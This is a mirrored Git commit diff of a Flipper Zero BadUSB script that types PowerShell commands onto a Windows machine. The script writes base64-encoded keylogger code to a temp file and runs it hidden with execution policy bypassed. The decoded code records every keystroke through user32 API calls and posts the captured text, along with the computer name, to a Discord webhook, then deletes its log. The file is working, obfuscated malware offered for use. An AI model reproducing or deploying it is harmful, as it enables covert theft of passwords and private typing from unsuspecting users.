gitea-mirror/BadUSB-Files-For-FlipperZero
1
0
Fork 0
mirror of https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git synced 2026-01-03 08:17:39 -08:00
Code Issues Packages Projects Releases Wiki Activity

Update Keylogger from base64 to Discord.txt

Browse Source
This commit is contained in:
beigeworm
2023-08-08 23:03:02 +00:00
committed by GitHub
parent b09b547246
commit 0ebea8175b
1 changed files with 7 additions and 12 deletions
Download Patch File Download Diff File Expand all files Collapse all files

19
OSINT/Keylogger from base64 to Discord.txt
View File

@@ -1,11 +1,12 @@
REM Title: Keylogger to Discord
REM Title: Keylogger from base64 to Discord
REM Author: @beigeworm
REM Description: Uses Powershell to gather keystroke info and send it via Discord.
REM Target: Windows 10
REM LEARN MORE HERE - https://github.com/beigeworm/Powershell-Tools-and-Toys
REM *SETUP*
REM replace WEBHOOK_GOES_HERE with your discord webhook.
REM set $MsgInterval=1 to desired interval beetween emails (in minutes). Default is 1 minute.
REM some setup for dukie script
DEFAULT_DELAY 100
@@ -14,21 +15,15 @@ REM Open Powershell and start logs.
DELAY 1000
GUI r
DELAY 500
REM Remove '-W Hidden' below to show the powershell setup window.
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
STRING powershell -NoP -NonI -Exec Bypass
ENTER
DELAY 5000
STRING '$MsgInterval = 1;$whuri = "WEBHOOK_GOES_HERE!"' | Out-File -FilePath "$env:temp/a.ps1" -Force
STRING '$dc = "WEBHOOK_GOES_HERE!"' | Out-File -FilePath "$env:temp/a.ps1" -Force
ENTER
STRING $b64 = 'RG97JGFwaXAgPSAxO1N0YXJ0LVNsZWVwIDQ7JHR0cnVuID0gMTskdHN0cnQgPSBHZXQtRGF0ZTskdGVuZCA9ICR0c3RydC5hZGRtaW51dGVzKCRNc2dJbnRlcnZhbCk7IGZ1bmN0aW9uIFN0YXJ0LUxvZ3MoJFBhdGggPSAiJGVudjp0ZW1wXGNoYXJzLnR4dCIpIHskc2lncyA9IEAiDQpbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8sIEV4YWN0U3BlbGxpbmc9dHJ1ZSldIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIHNob3J0IEdldEFzeW5jS2V5U3RhdGUoaW50IHZpcnR1YWxLZXlDb2RlKTsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0gcHVibGljIHN0YXRpYyBleHRlcm4gaW50IEdldEtleWJvYXJkU3RhdGUoYnl0ZVtdIGtleXN0YXRlKTsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0gcHVibGljIHN0YXRpYyBleHRlcm4gaW50IE1hcFZpcnR1YWxLZXkodWludCB1Q29kZSwgaW50IHVNYXBUeXBlKTsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0gcHVibGljIHN0YXRpYyBleHRlcm4gaW50IFRvVW5pY29kZSh1aW50IHdWaXJ0S2V5LCB1aW50IHdTY2FuQ29kZSwgYnl0ZVtdIGxwa2V5c3RhdGUsIFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXIgcHdzekJ1ZmYsIGludCBjY2hCdWZmLCB1aW50IHdGbGFncyk7DQoiQDskQVBJID0gQWRkLVR5cGUgLU1lbWJlckRlZmluaXRpb24gJHNpZ3MgLU5hbWUgJ1dpbjMyJyAtTmFtZXNwYWNlIEFQSSAtUGFzc1RocnUgICA7JG51bGwgPSBOZXctSXRlbSAtUGF0aCAkUGF0aCAtSXRlbVR5cGUgRmlsZSAtRm9yY2U7dHJ5e1NsZWVwIDE7JHJ1biA9IDA7d2hpbGUgKCR0dHJ1biAtZ2UgJHJ1bikge3doaWxlICgkdGVuZCAtZ2UgJHRub3cpIHtTbGVlcCAtTWlsbGlzZWNvbmRzIDMwO2ZvciAoJGFzY2lpID0gOTsgJGFzY2lpIC1sZSAyNTQ7ICRhc2NpaSsrKSB7DQokc3RhdGUgPSAkQVBJOjpHZXRBc3luY0tleVN0YXRlKCRhc2NpaSk7IGlmICgkc3RhdGUgLWVxIC0zMjc2Nyl7JG51bGwgPSBbY29uc29sZV06OkNhcHNMb2NrOyR2aXJ0dWFsS2V5ID0gJEFQSTo6TWFwVmlydHVhbEtleSgkYXNjaWksIDMpOyRrYnN0YXRlID0gTmV3LU9iamVjdCBCeXRlW10gMjU2DQokY2hlY2trYnN0YXRlID0gJEFQSTo6R2V0S2V5Ym9hcmRTdGF0ZSgka2JzdGF0ZSk7JG15Y2hhciA9IE5ldy1PYmplY3QgLVR5cGVOYW1lIFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXI7JHN1Y2Nlc3MgPSAkQVBJOjpUb1VuaWNvZGUoJGFzY2lpLCAkdmlydHVhbEtleSwgJGtic3RhdGUsICRteWNoYXIsICRteWNoYXIuQ2FwYWNpdHksIDApDQppZiAoJHN1Y2Nlc3MpIHtbU3lzdGVtLklPLkZpbGVdOjpBcHBlbmRBbGxUZXh0KCRQYXRoLCAkbXljaGFyLCBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVbmljb2RlKX19fSR0bm93ID0gR2V0LURhdGV9OyRtc2cgPSBHZXQtQ29udGVudCAtUGF0aCAkUGF0aCAtUmF3DQokZXNjbXNnID0gJG1zZyAtcmVwbGFjZSAnWyY8Pl0nLCB7JGFyZ3NbMF0uVmFsdWUuUmVwbGFjZSgnJicsICcmYW1wOycpLlJlcGxhY2UoJzwnLCAnJmx0OycpLlJlcGxhY2UoJz4nLCAnJmd0OycpfTskanNvbiA9IEB7InVzZXJuYW1lIiA9ICIkZW52OkNPTVBVVEVSTkFNRSIgOyAiY29udGVudCIgPSAkZXNjbXNnfSB8IENvbnZlcnRUby1Kc29uDQpTbGVlcCAxO0ludm9rZS1SZXN0TWV0aG9kIC1VcmkgJHdodXJpIC1NZXRob2QgUG9zdCAtQ29udGVudFR5cGUgImFwcGxpY2F0aW9uL2pzb24iIC1Cb2R5ICRqc29uO1NsZWVwIDE7UmVtb3ZlLUl0ZW0gLVBhdGggJFBhdGggLWZvcmNlfX1maW5hbGx5e319U3RhcnQtTG9nc31XaGlsZSAoJGFwaXAgLWxlIDUp'
STRING $b64 = 'JEFQSSA9IEAnDQpbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8sIEV4YWN0U3BlbGxpbmc9dHJ1ZSldIA0KcHVibGljIHN0YXRpYyBleHRlcm4gc2hvcnQgR2V0QXN5bmNLZXlTdGF0ZShpbnQgdmlydHVhbEtleUNvZGUpOyANCltEbGxJbXBvcnQoInVzZXIzMi5kbGwiLCBDaGFyU2V0PUNoYXJTZXQuQXV0byldDQpwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgR2V0S2V5Ym9hcmRTdGF0ZShieXRlW10ga2V5c3RhdGUpOw0KW0RsbEltcG9ydCgidXNlcjMyLmRsbCIsIENoYXJTZXQ9Q2hhclNldC5BdXRvKV0NCnB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBNYXBWaXJ0dWFsS2V5KHVpbnQgdUNvZGUsIGludCB1TWFwVHlwZSk7DQpbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIiwgQ2hhclNldD1DaGFyU2V0LkF1dG8pXQ0KcHVibGljIHN0YXRpYyBleHRlcm4gaW50IFRvVW5pY29kZSh1aW50IHdWaXJ0S2V5LCB1aW50IHdTY2FuQ29kZSwgYnl0ZVtdIGxwa2V5c3RhdGUsIFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXIgcHdzekJ1ZmYsIGludCBjY2hCdWZmLCB1aW50IHdGbGFncyk7DQonQA0KDQokbHB0aCA9ICIkZW52OnRlbXAvdC50eHQiDQokQVBJID0gQWRkLVR5cGUgLU1lbWJlckRlZmluaXRpb24gJEFQSSAtTmFtZSAnV2luMzInIC1OYW1lc3BhY2UgQVBJIC1QYXNzVGhydQ0KJG5vID0gTmV3LUl0ZW0gLVBhdGggJGxwdGggLUl0ZW1UeXBlIEZpbGUgLUZvcmNlDQokZmNvbnQgPSBHZXQtQ29udGVudCAtUGF0aCAkbHB0aCAtUmF3DQokbGt0ID0gW1N5c3RlbS5EaWFnbm9zdGljcy5TdG9wd2F0Y2hdOjpTdGFydE5ldygpDQoka3RoID0gW1RpbWVTcGFuXTo6RnJvbVNlY29uZHMoMTApDQpXaGlsZSAoJHRydWUpew0KJGtwciA9ICRmYWxzZQ0KdHJ5ew0Kd2hpbGUgKCRsa3QuRWxhcHNlZCAtbHQgJGt0aCkgew0KU3RhcnQtU2xlZXAgLU1pbGxpc2Vjb25kcyAzMA0KZm9yICgkYXNjID0gOTsgJGFzYyAtbGUgMjU0OyAkYXNjKyspew0KJGtleXN0ID0gJEFQSTo6R2V0QXN5bmNLZXlTdGF0ZSgkYXNjKQ0KaWYgKCRrZXlzdCAtZXEgLTMyNzY3KSB7DQoka3ByID0gJHRydWUNCiRsa3QuUmVzdGFydCgpDQokbnVsbCA9IFtjb25zb2xlXTo6Q2Fwc0xvY2sNCiR2dGtleSA9ICRBUEk6Ok1hcFZpcnR1YWxLZXkoJGFzYywgMykNCiRrYnN0ID0gTmV3LU9iamVjdCBCeXRlW10gMjU2DQokY2hlY2trYnN0ID0gJEFQSTo6R2V0S2V5Ym9hcmRTdGF0ZSgka2JzdCkNCiRsb2djaGFyID0gTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlciAgICAgDQppZiAoJEFQSTo6VG9Vbmljb2RlKCRhc2MsICR2dGtleSwgJGtic3QsICRsb2djaGFyLCAkbG9nY2hhci5DYXBhY2l0eSwgMCkpIHsNCltTeXN0ZW0uSU8uRmlsZV06OkFwcGVuZEFsbFRleHQoJGxwdGgsICRsb2djaGFyLCBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVbmljb2RlKSANCn19fX19DQpmaW5hbGx5ew0KSWYgKCRrcHIpew0KJGZjb250ID0gR2V0LUNvbnRlbnQgLVBhdGggJGxwdGggLVJhdw0KJGVzY21zZ3N5cyA9ICRmY29udCAtcmVwbGFjZSAnWyY8Pl0nLCB7JGFyZ3NbMF0uVmFsdWUuUmVwbGFjZSgnJicsICcmYW1wOycpLlJlcGxhY2UoJzwnLCAnJmx0OycpLlJlcGxhY2UoJz4nLCAnJmd0OycpfQ0KJGpzb25zeXMgPSBAeyJ1c2VybmFtZSIgPSAiJGVudjpDT01QVVRFUk5BTUUiIDsiY29udGVudCIgPSAkZXNjbXNnc3lzfSB8IENvbnZlcnRUby1Kc29uDQpJbnZva2UtUmVzdE1ldGhvZCAtVXJpICRkYyAtTWV0aG9kIFBvc3QgLUNvbnRlbnRUeXBlICJhcHBsaWNhdGlvbi9qc29uIiAtQm9keSAkanNvbnN5cw0KUmVtb3ZlLUl0ZW0gLVBhdGggJGxwdGggLUZvcmNlDQoka3ByID0gJGZhbHNlDQp9fQ0KJGxrdC5SZXN0YXJ0KCkNClN0YXJ0LVNsZWVwIC1NaWxsaXNlY29uZHMgMTANCn0='
ENTER
STRING $decodedFile = [System.Convert]::FromBase64String($b64);$decodedText = [System.Text.Encoding]::UTF8.GetString($decodedFile);$decodedText | Out-File -FilePath "$env:temp/a.ps1" -Append
ENTER
STRING Start-Process PowerShell.exe -ArgumentList ("-NoP -Ep Bypass -w h -File `"$env:temp/a.ps1`"" -f $PSCommandPath);sleep 7;Remove-Item -Path $File -Force
STRING Start-Process PowerShell.exe -ArgumentList ("-NoP -Ep Bypass -w h -File `"$env:temp/a.ps1`"" -f $PSCommandPath);sleep 7;Remove-Item -Path $File -Force;exit
ENTER
STRING
ENTER